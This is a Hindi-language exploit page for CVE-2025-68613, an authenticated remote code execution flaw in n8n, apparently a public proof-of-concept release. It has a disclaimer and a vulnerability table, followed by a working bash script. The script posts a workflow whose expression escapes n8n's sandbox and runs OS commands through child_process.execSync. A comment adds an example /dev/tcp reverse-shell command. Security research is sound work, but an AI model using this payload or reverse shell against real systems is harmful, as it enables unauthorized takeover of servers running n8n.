
CVE-2025-68613 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: एक्सप्रेशन इंजेक्शन के माध्यम से n8n में प्रमाणित रिमोट कोड निष्पादन
n8n वर्कफ़्लो ऑटोमेशन टूल में गंभीर रिमोट कोड निष्पादन (CVSS 9.9)
प्रूफ़ ऑफ़ कॉन्सेप्ट – केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए
यह कोड केवल शैक्षिक उद्देश्यों और नियंत्रित प्रयोगशाला वातावरण में अधिकृत सुरक्षा परीक्षण के लिए सख्ती से प्रदान किया गया है।
प्रोडक्शन सिस्टम या बिना स्पष्ट लिखित अनुमति के किसी भी सिस्टम पर अनधिकृत उपयोग अवैध है और अधिकांश न्यायक्षेत्रों में कंप्यूटर दुरुपयोग और साइबर सुरक्षा कानूनों का उल्लंघन करता है।
अपने जोखिम पर उपयोग करें। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।
| फ़ील्ड | विवरण |
|---|
| एक्सप्लॉइट शीर्षक | n8n प्रमाणित एक्सप्रेशन इंजेक्शन रिमोट कोड निष्पादन |
| CVE | CVE-2025-68613 |
| प्रकटीकरण तिथि | 2025-12-25 |
| लेखक | Mohammed Idrees Banyamer |
| लेखक का देश | Jordan |
| संपर्क / सोशल | Instagram: @banyamer_security |
| GitHub | mbanyamer |
| विक्रेता | n8n.io |
| सॉफ़्टवेयर रिपॉज़िटरी | github.com/n8n-io/n8n |
| असुरक्षित संस्करण | ≥ 0.211.0 < 1.120.4 |
| पैच किए गए संस्करण | 1.120.4, 1.121.1, 1.122.0 और उससे ऊपर |
| परीक्षण किया गया | n8n 1.119.3 (Docker) |
| भेद्यता प्रकार | एक्सप्रेशन सैंडबॉक्स एस्केप के माध्यम से प्रमाणित रिमोट कोड निष्पादन |
| CVSS स्कोर | 9.9 (गंभीर) |
यह भेद्यता एक प्रमाणित उपयोगकर्ता को दुर्भावनापूर्ण एक्सप्रेशन का उपयोग करके वर्कफ़्लो बनाने या संशोधित करने की अनुमति देती है, जो n8n के एक्सप्रेशन सैंडबॉक्स को बायपास करते हैं, जिसके परिणामस्वरूप n8n प्रक्रिया के विशेषाधिकारों के साथ पूर्ण ऑपरेटिंग सिस्टम कमांड निष्पादन होता है।
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613
TARGET="http://localhost:5678" # ← Change to your target
API_KEY="your_n8n_api_key_here" # ← Insert valid API Key (or use Basic Auth / session)
CMD="id" # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"
echo "[*] Sending malicious workflow to ${TARGET}"
curl -s -X POST "${TARGET}/rest/workflows" \
-H "Content-Type: application/json" \
-H "X-N8N-API-KEY: ${API_KEY}" \
-d '{
"name": "CVE-2025-68613 PoC",
"active": false,
"nodes": [
{
"parameters": {
"values": {
"string": [
{
"name": "result",
"value": "'${PAYLOAD}'"
}
]
}
},
"name": "Exploit",
"type": "n8n-nodes-base.set",
"typeVersion": 1,
"position": [460, 300]
}
],
"connections": {}
}'
echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"